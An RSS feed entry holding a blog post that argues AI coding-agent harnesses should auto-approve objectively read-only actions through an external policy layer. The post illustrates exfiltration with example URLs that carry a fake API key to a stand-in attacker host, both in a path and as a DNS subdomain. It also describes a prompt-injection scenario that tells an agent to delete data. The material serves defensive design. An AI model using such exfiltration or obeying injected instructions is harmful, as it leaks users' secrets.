<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Virgil</title><link>https://blog.virg.be/</link><description>Recent content on Virgil</description><generator>Hugo</generator><language>en-us</language><lastBuildDate>Tue, 14 Apr 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://feed.virg.be/rss.xml" rel="self" type="application/rss+xml"/><item><title>Agents ask too many questions</title><link>https://blog.virg.be/agents-ask-too-many-questions/</link><pubDate>Tue, 14 Apr 2026 00:00:00 +0000</pubDate><guid>https://blog.virg.be/agents-ask-too-many-questions/</guid><description>&lt;p&gt;If you&amp;rsquo;ve used any agent harness for development work — Claude Code, OpenCode, Devin, or one of the many others — you&amp;rsquo;ve run into this: you&amp;rsquo;re mid-task, the agent needs to search the web or read a file, and it stops to ask permission. This is disruptive to the flow.&lt;/p&gt;
&lt;p&gt;The naive fix is to just trust the agent more — expand the allow list, enable auto mode, and move on. But that&amp;rsquo;s not a viable long-term solution. An agent that self-certifies its own intent is exploitable. If a model can decide that fetching a URL is &amp;ldquo;just reading,&amp;rdquo; it can be manipulated into deciding that almost anything is.&lt;/p&gt;</description><content:encoded><![CDATA[<p>If you&rsquo;ve used any agent harness for development work — Claude Code, OpenCode, Devin, or one of the many others — you&rsquo;ve run into this: you&rsquo;re mid-task, the agent needs to search the web or read a file, and it stops to ask permission. This is disruptive to the flow.</p>
<p>The naive fix is to just trust the agent more — expand the allow list, enable auto mode, and move on. But that&rsquo;s not a viable long-term solution. An agent that self-certifies its own intent is exploitable. If a model can decide that fetching a URL is &ldquo;just reading,&rdquo; it can be manipulated into deciding that almost anything is.</p>
<p>The right fix is to take the decision away from the agent entirely.</p>
<h2 id="read-only-is-an-objective-property">Read-only is an objective property</h2>
<p>An action is read-only if it observes without modifying. Not &ldquo;read-only from the agent&rsquo;s perspective&rdquo; — objectively read-only. HTTP GET, file read, directory listing. These have a defined shape. A policy layer external to the agent can inspect each action against objective criteria — HTTP method, syscall type, file path — and make the call without asking the model what it thinks it&rsquo;s doing.</p>
<p>State-changing actions still prompt. Everything else passes automatically.</p>
<div class="mermaid">
flowchart TD
    A[Agent wants to take an action] --> B{Is it read-only?\nHTTP GET, file read, directory listing}
    B -- Yes --> C{Does it contain\na secret or PII?}
    C -- No --> D[Auto-approve]
    C -- Yes --> E[Prompt user]
    B -- No --> E

</div>
<script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
<script>mermaid.initialize({ startOnLoad: true, theme: 'dark' });</script>

<p>The policy layer evaluates each action against objective criteria — the model&rsquo;s intent is never consulted.</p>
<h2 id="two-edge-cases-worth-taking-seriously">Two edge cases worth taking seriously</h2>
<p>A GET request <em>can</em> exfiltrate data. If an agent is manipulated into appending a secret to a query string — <code>https://example.com/?token=sk-ant-...</code> — the request is technically read-only but it&rsquo;s leaking something. The same applies to path segments: <code>https://attacker.example.com/exfil/sk-ant-api03-abc123</code> is functionally identical, but some implementations only scan query parameters. And data can be stuffed into outbound request headers — <code>Referer</code>, <code>User-Agent</code>, a custom <code>X-Data</code> header — none of which show up in URL inspection at all. The policy layer needs to handle all of this: run gitleaks-style pattern matching on the full URL <em>and</em> outbound headers before granting automatic permission. If anything contains what looks like a secret or personal data, it gets flagged.</p>
<p>DNS-based exfiltration is subtler. The agent resolves <code>sk-ant-api03-abc123.attacker.example.com</code>. The GET never fires — but the DNS lookup already transmitted the secret to the attacker&rsquo;s nameserver. This happens below the HTTP layer. URL pattern matching never sees it because there&rsquo;s no URL yet. Mitigation: restrict DNS resolution to known domains, or run the same secret-pattern matching on hostnames before resolution.</p>
<h2 id="prompt-injection-doesnt-break-this">Prompt injection doesn&rsquo;t break this</h2>
<p>The obvious objection: what if the agent fetches a page that contains malicious instructions? The policy layer permits the fetch — it&rsquo;s a GET — but now those instructions tell the agent to delete all your data.</p>
<p>This isn&rsquo;t a problem. That deletion is a new action, evaluated independently by the policy layer at the point of execution. It gets flagged as a write and stopped. The model read something bad, but reading bad content doesn&rsquo;t bypass the enforcement layer.</p>
<h2 id="where-things-stand">Where things stand</h2>
<p>Most agent harnesses are moving toward fewer interruptions. Allow lists, intent classifiers, &ldquo;auto mode&rdquo; flags — these are all variations on the same theme: the harness tries to determine what&rsquo;s safe by reasoning about the agent&rsquo;s intent.</p>
<p>The problem is that intent is opaque and manipulable. A classifier trained to identify &ldquo;safe&rdquo; actions can be nudged into misclassifying. A model asked &ldquo;is this safe?&rdquo; can be prompted into saying yes. And in practice, these systems are reportedly brittle — auto modes that don&rsquo;t fire when they should, classifiers that trigger on actions they shouldn&rsquo;t.</p>
<p>The missing piece is enforcement that&rsquo;s external and objective. Not a model deciding what&rsquo;s safe. Not a classifier trained on past behavior. A proxy or kernel filter that doesn&rsquo;t care what the model thinks — it only cares what the action <em>is</em>.</p>
<p>This isn&rsquo;t theoretical. The pattern works because read-only and write are fundamentally different categories of action, not a spectrum the model has to reason about. An HTTP GET, a file read, a directory listing — these can be authorized by policy without ever asking the agent. Everything else gets held.</p>
<h2 id="for-builders-and-power-users">For builders and power users</h2>
<p>If you&rsquo;re building an agent harness: this is the permission model you want. Inspect actions at the transport or syscall layer, classify by type, apply pattern matching on sensitive data. The agent sees no prompts for reads; it only stops for writes.</p>
<p>If you&rsquo;re choosing a harness: look for one with an external policy layer, not one that delegates trust to the model. Fewer interruptions are nice, but they only matter if the enforcement is real.</p>
<h2 id="further-reading">Further reading</h2>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1048/003/" target="_blank" rel="noopener noreferrer">MITRE ATT&amp;CK T1048.003 — Exfiltration Over Unencrypted Non-C2 Protocol</a>
 — the canonical reference for DNS-based and other alternative-protocol exfiltration.</li>
<li><a href="https://github.com/gitleaks/gitleaks" target="_blank" rel="noopener noreferrer">Gitleaks</a>
 — the secret-scanning tool referenced in this post. Regex-based pattern matching for API keys, tokens, and credentials.</li>
</ul>
]]></content:encoded></item></channel></rss>